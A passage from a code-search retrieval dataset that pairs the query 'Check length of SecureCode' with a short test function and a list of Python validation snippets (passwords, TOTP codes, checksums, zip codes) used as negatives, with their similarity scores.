\tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def number_len(password_length):\r\n while True:\r\n numb_length = input('How much numbers you want in password? At least 1 : ')\r\n try:\r\n numb_length = int(numb_length)\r\n if 1 <= numb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(numb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(numb_length))\r\n return numb_length", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def CheckZipCode(zipcode):\n # see if there are enough digits\n if (len(zipcode) >= 5):\n # check if numerical\n try:\n int(zipcode)\n return True\n except:\n return False\n else:\n return False", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def test_encodes_short_string(self):\n result = encode_run_length(\"AAABBBRYUIWW\")\n self.assertEqual(result, \"3A3B1R1Y1U1I2W\")", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def length(value):\n\n # Try to return the length\n return len(value)", "def len23(self, len): # -> None:\n ...", "def is_valid_control_number(id_code: str) -> bool:\n check_numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 1]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == 10:\n check_numbers = [3, 4, 5, 6, 7, 8, 9, 1, 2, 3]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == int(id_code[-1]):\n return True\n return False", "def test_valid_length(self):\n f = lws.valid_length\n assert f('', [1]) is True\n assert f('+', [1, 1]) is True\n assert f('+', []) is False\n assert f('?', []) is True\n assert f('?', [1]) is True\n assert f('?', [1, 1]) is False\n assert f('?', [1, 1, 1]) is False\n assert f('*', []) is True\n assert f('*', [1, 1, 1]) is True", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')", "def test_cpf_has_11_digits(self):\r\n form = self.make_validated_form(cpf='1234')\r\n self.assertFormErrorCode(form, 'cpf', 'length')", "def validate(code):\n if not code.isdigit():\n raise IllegalCharacterError('[0-9]{%d}' % UPCA.digits)\n\n if len(code) != UPCA.digits:\n raise ValueError('Bar code %s requires %d digits' % (code, UPCA.digits))\n\n checksum = UPCA.calculate_checksum(code)\n if checksum != int(code[-1]):\n raise ValueError('Checksum character mismatch %s != %s' % (checksum, code[-1]))", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def getLength(message):\r\n length = 0\r\n for char in message:\r\n if char in alphaUpper or alphaLower:\r\n length += 1\r\n return length", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def password_strength(self, password_info):\n\n # Check for digits in the password\n digit_error = re.search(r\"\\d\", password_info) is None\n\n # Check for uppercase characters in the password\n uppercase_error = re.search(r\"[A-Z]\", password_info) is None\n\n # Check for lowercase characters in the password\n lowercase_error = re.search(r\"[a-z]\", password_info) is None\n\n # Check the condition of the password\n password_condition = not(\n digit_error or\n uppercase_error or\n lowercase_error\n )\n\n return password_condition # return the condition of the password", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. \n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def verify(self, code) -> bool:\n totp = self.__initialize_totp()\n return totp.verify(code)", "def url_contains_auth_code(url: str) -> bool:\n return url.count(\"code=\") == 1", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False" ]
[ "0.6570652", "0.65147936", "0.6507782", "0.636752", "0.6305414", "0.6304687", "0.62863815", "0.6257223", "0.6186307", "0.6163863", "0.61181813", "0.6054365", "0.5972026", "0.5970523", "0.59098756", "0.5856316", "0.58449227", "0.58319175", "0.58306134", "0.5820003", "0.57585216", "0.57269144", "0.5714411", "0.570993", "0.5708055", "0.570669", "0.5699649", "0.5694657", "0.5692152", "0.56766814", "0.56750864", "0.56735575", "0.5671589", "0.56712943", "0.56587887", "0.56399494", "0.5634607", "0.56309503", "0.5607847", "0.55891645", "0.5580185", "0.55771244", "0.5569683", "0.5568241", "0.5557203", "0.5557203", "0.5524747", "0.5521789", "0.5514045", "0.5514045", "0.5510478", "0.55092525", "0.55065507", "0.5478073", "0.547748", "0.5475223", "0.5468194", "0.54677594", "0.5465956", "0.5464781", "0.546441", "0.54578143", "0.54528254", "0.54462945", "0.54236984", "0.54098666", "0.53894883", "0.53850216", "0.5383557", "0.53703123", "0.5362179", "0.5354814", "0.5351773", "0.5350478", "0.5349091", "0.5348848", "0.53487664", "0.53428566", "0.53428036", "0.5342495", "0.5336524", "0.5331083", "0.5330924", "0.5330855", "0.53306276", "0.5324838", "0.5318119", "0.5318103", "0.53176796", "0.53068185", "0.5301469", "0.53002256", "0.52972865", "0.5294435", "0.5291588", "0.5290235", "0.52751344", "0.52741945", "0.5267926", "0.5265282", "0.526437" ]
0.0
-1
Check length of SecureCode (SecureCode= 1234 )
def test_39(self): assert 'True' == Api.requestBlock('test-39')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def __len__(self):\n return len(self.code)", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def __len__(self):\n return self.cli.passwords.len()", "def is_private(code):\n return 4000 <= code <= 4999", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def is_reserved(code):\n return 1000 <= code <= 2999", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def SecondPart():\n return passwordChecker(data)", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def checksum(code):\n return sum(code) % 256", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def strlen(val): \n return len(val)", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def number_len(password_length):\r\n while True:\r\n numb_length = input('How much numbers you want in password? At least 1 : ')\r\n try:\r\n numb_length = int(numb_length)\r\n if 1 <= numb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(numb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(numb_length))\r\n return numb_length", "def len12(self, len): # -> None:\n ...", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. \n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def CheckZipCode(zipcode):\n # see if there are enough digits\n if (len(zipcode) >= 5):\n # check if numerical\n try:\n int(zipcode)\n return True\n except:\n return False\n else:\n return False", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def test_cpf_has_11_digits(self):\r\n form = self.make_validated_form(cpf='1234')\r\n self.assertFormErrorCode(form, 'cpf', 'length')", "def is_valid_control_number(id_code: str) -> bool:\n check_numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 1]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == 10:\n check_numbers = [3, 4, 5, 6, 7, 8, 9, 1, 2, 3]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == int(id_code[-1]):\n return True\n return False", "def test_encodes_short_string(self):\n result = encode_run_length(\"AAABBBRYUIWW\")\n self.assertEqual(result, \"3A3B1R1Y1U1I2W\")", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def valid_barcode(s):\n # implement this function!\n odd_digits = 0\n even_digits = 0\n result = 0\n for i in range(len(s) - 1):\n if i % 2 == 0:\n odd_digits += int(s[i])\n else:\n even_digits += int(s[i])\n result = (3 * odd_digits + even_digits) % 10\n if result != 0:\n result = 10 - result\n\n try:\n if int(s[-1]) == result and len(s) == 12:\n return True\n else:\n return False\n except IndexError:\n return False", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def len23(self, len): # -> None:\n ...", "def checkdigit(code):\n check = sum((i+1)*int(code[i]) for i in range(9)) % 11\n return 'X' if check == 10 else str(check)", "def validate(number):\n number = compact(number)\n if len(number) != 9:\n raise InvalidLength()\n if not isdigits(number[2:]):\n raise InvalidFormat()\n if not isdigits(number[:2]) and not all(x in 'ABCEHKMOPT' for x in number[:2]):\n raise InvalidFormat()\n if number[0] not in '1234567ABCEHKM':\n 